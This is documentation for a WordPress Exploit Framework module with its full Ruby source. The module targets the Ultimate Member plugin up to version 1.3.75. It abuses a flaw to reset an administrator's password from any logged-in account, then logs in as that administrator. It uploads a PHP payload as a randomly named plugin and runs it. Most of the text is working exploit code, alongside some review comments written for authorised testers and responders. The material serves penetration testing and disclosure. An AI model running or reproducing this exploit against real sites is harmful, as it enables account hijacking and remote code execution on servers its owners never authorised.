Class: Wpxf::Exploit::UltimateMemberShellUpload
- Includes:
- Wpxf, Net::HttpClient, WordPress::Login, WordPress::Plugin
- Defined in:
- lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb
Constant Summary
Constants included from Net::HttpOptions
Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST
Constants included from WordPress::Options
WordPress::Options::WP_OPTION_CONTENT_DIR
Instance Attribute Summary
Attributes inherited from Module
#active_workspace, #event_emitter, #payload, #session_cookie
Attributes included from Options
Instance Method Summary
- #admin_user_id ⇒ Object
- #admin_username ⇒ Object
- #before_upload ⇒ Object
- #check ⇒ Object
- #execute_password_change ⇒ Object
- #execute_payload ⇒ Object
- #initialize ⇒ UltimateMemberShellUpload (constructor): A new instance of UltimateMemberShellUpload.
- #new_password ⇒ Object
- #password_form_url ⇒ Object
- #requires_authentication ⇒ Object
- #run ⇒ Object
- #upload_payload ⇒ Object
Methods included from WordPress::Plugin
#fetch_plugin_upload_nonce, #generate_wordpress_plugin_header, #upload_payload_as_plugin, #upload_payload_as_plugin_and_execute
Methods included from WordPress::Login
#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body
Methods included from Net::HttpClient
#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri
Methods included from Net::TyphoeusHelper
#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options
Methods included from Net::UserAgent
#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent
Methods included from Versioning::OSVersions
#random_nt_version, #random_osx_version
Methods included from Versioning::BrowserVersions
#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version
Methods included from Wpxf
app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version
Methods inherited from Module
#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option
Methods included from Db::Credentials
Methods included from ModuleAuthentication
Methods included from WordPress::Urls
#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc
Methods included from WordPress::Options
Methods included from WordPress::Fingerprint
#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version
Methods included from Options
#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option
Methods included from OutputEmitters
#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning
Methods included from ModuleInfo
#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info
Constructor Details
#initialize ⇒ UltimateMemberShellUpload
Returns a new instance of UltimateMemberShellUpload.
# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 9 def initialize super update_info( name: 'Ultimate Member <= 1.3.75 Shell Upload', desc: 'This module exploits a vulnerability that allows users of any level to change '\ 'the password of any user. The module requires you login with an account of any '\ 'level, which will then be used to change the specified admin users\' password. '\ 'The compromised admin account will then be used to store and execute the payload.', author: [ 'James Golovich', # Discovery and disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '8688'], ['URL', 'https://ultimatemember.com/security-release-v1-3-76/'] ], date: 'Dec 08 2016' ) ([ StringOption.new( name: 'password_form_path', desc: 'The path of the change password form (default is /account/password/)', required: true ), IntegerOption.new( name: 'admin_user_id', desc: 'The ID of the user to hijack the account of', required: true ), StringOption.new( name: 'admin_username', desc: 'The username of the admin user to hijack the account of', required: true ) ]) end |
Instance Method Details
#admin_user_id ⇒ Object
# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 60

# Reads the `admin_user_id` option through normalized_option_value.
#
# @return [Object] the normalized value of the `admin_user_id` option
def admin_user_id
  option_key = 'admin_user_id'
  normalized_option_value(option_key)
end
#admin_username ⇒ Object
# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 64

# Reads the `admin_username` option through normalized_option_value.
#
# @return [Object] the normalized value of the `admin_username` option
def admin_username
  option_key = 'admin_username'
  normalized_option_value(option_key)
end
#before_upload ⇒ Object
# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 90

# Submits the password change for the configured account and, if the server
# answers with a 302, logs in as that account and keeps the resulting cookie
# in @admin_cookie.
#
# Review notes for authorised testers and responders:
# - The new password is written to the module output in clear text, so any
#   captured console output or log of a run contains a live credential.
# - No step that restores the original password is visible in this class;
#   the account stays changed after a run unless something outside this
#   listing resets it.
#
# @return [Boolean] true when the follow-up login produced a cookie,
#   false when the change was not answered with 302 or the login failed
def before_upload
  emit_info "Changing password for #{admin_username} to #{new_password}"

  response = execute_password_change
  if response.code != 302
    emit_error "Password change returned status #{response.code}", true
    emit_error "Failed to change the password for #{admin_username}"
    return false
  end

  @admin_cookie = authenticate_with_wordpress(admin_username, @new_password)
  @admin_cookie ? true : false
end
#check ⇒ Object
# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 48

# Delegates the vulnerability check to check_plugin_version_from_readme for
# the `ultimate-member` plugin with version 1.3.76.
#
# The module name gives <= 1.3.75 as the affected range, so 1.3.76 is
# presumably passed as the first fixed version (confirm against the helper).
# The helper's name indicates the version is read from the plugin readme.
#
# @return [Object] whatever check_plugin_version_from_readme returns
def check
  plugin_slug = 'ultimate-member'
  fixed_version = '1.3.76'
  check_plugin_version_from_readme(plugin_slug, fixed_version)
end
#execute_password_change ⇒ Object
# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 76 def execute_password_change execute_post_request( url: password_form_url, cookie: , body: { '_um_password_change' => '1', 'timestamp' => Utility::Text.rand_numeric(3), 'user_password' => new_password, 'confirm_user_password' => new_password, 'user_id' => admin_user_id } ) end |
#execute_payload ⇒ Object
# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 115

# Requests @payload_url and reports the response body when the server
# answers 200 with a non-blank body.
#
# Nothing is emitted for a missing response, a non-200 status or a blank
# body, so a silent run does not by itself show that the request failed.
#
# @return [Object, nil] the result of emit_success, or nil when nothing
#   was emitted
def execute_payload
  response = execute_get_request(url: @payload_url)
  return unless response && response.code == 200
  return if response.body.strip.empty?

  emit_success "Result: #{response.body}"
end
#new_password ⇒ Object
# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 68

# Returns the replacement password, generating it on first use and caching
# it in @new_password so every later call sees the same value.
#
# The value is built from five Utility::Text calls: three alphanumeric
# characters, one lower-case letter, two digits, one upper-case letter and
# three more alphanumeric characters. Mixing the classes presumably
# satisfies a password-complexity rule on the form (TODO confirm). How
# Utility::Text sources its randomness is not visible here.
#
# @return [String] the cached or newly generated password
def new_password
  return @new_password if @new_password

  leading = Utility::Text.rand_alphanumeric(3)
  lower = Utility::Text.rand_alpha(1, :lower)
  digits = Utility::Text.rand_numeric(2)
  upper = Utility::Text.rand_alpha(1, :upper)
  trailing = Utility::Text.rand_alphanumeric(3)

  @new_password = leading + lower + digits + upper + trailing
end
#password_form_url ⇒ Object
# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 56

# Builds the URL of the change-password form by joining full_uri with the
# `password_form_path` option via normalize_uri.
#
# @return [Object] the value returned by normalize_uri
def password_form_url
  site_root = full_uri
  form_path = datastore['password_form_path']
  normalize_uri(site_root, form_path)
end
#requires_authentication ⇒ Object
# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 52

# Always returns true. The module description states that an account of any
# level is needed, so the framework presumably uses this flag to require a
# login before run proceeds (confirm against the authentication mixin).
#
# @return [Boolean] always true
def requires_authentication
  true
end
#run ⇒ Object
# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 120

# Runs the module: the inherited run checks, then before_upload, then the
# upload and the request to the uploaded file.
#
# NOTE(review): the result of upload_payload is not checked, so this method
# still requests @payload_url and returns true when the upload reported
# failure. A true return is therefore not proof that the target was affected.
#
# @return [Boolean] false when the inherited run or before_upload fails,
#   true otherwise
def run
  unless super
    return false
  end

  unless before_upload
    return false
  end

  emit_info 'Uploading payload...'
  upload_payload

  emit_info "Executing the payload at #{@payload_url}..."
  execute_payload

  true
end
#upload_payload ⇒ Object
# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 105

# Uploads the payload as a plugin using the cookie stored in @admin_cookie
# and records the URL it is expected at in @payload_url.
#
# Both the plugin name and the payload file name are ten random letters,
# and the URL is built under wordpress_url_plugins as <plugin>/<payload>.php.
# For responders, a plugin directory with such a name that the site owner
# did not install is the artefact this step leaves. Whether anything in the
# framework removes it afterwards is not visible in this class.
#
# @return [Boolean] true when upload_payload_as_plugin reports success,
#   false after emitting an error otherwise
def upload_payload
  plugin_dir = Utility::Text.rand_alpha(10)
  script_name = Utility::Text.rand_alpha(10)
  @payload_url = normalize_uri(wordpress_url_plugins, plugin_dir, "#{script_name}.php")

  uploaded = upload_payload_as_plugin(plugin_dir, script_name, @admin_cookie)
  unless uploaded
    emit_error 'Failed to upload the payload'
    return false
  end

  true
end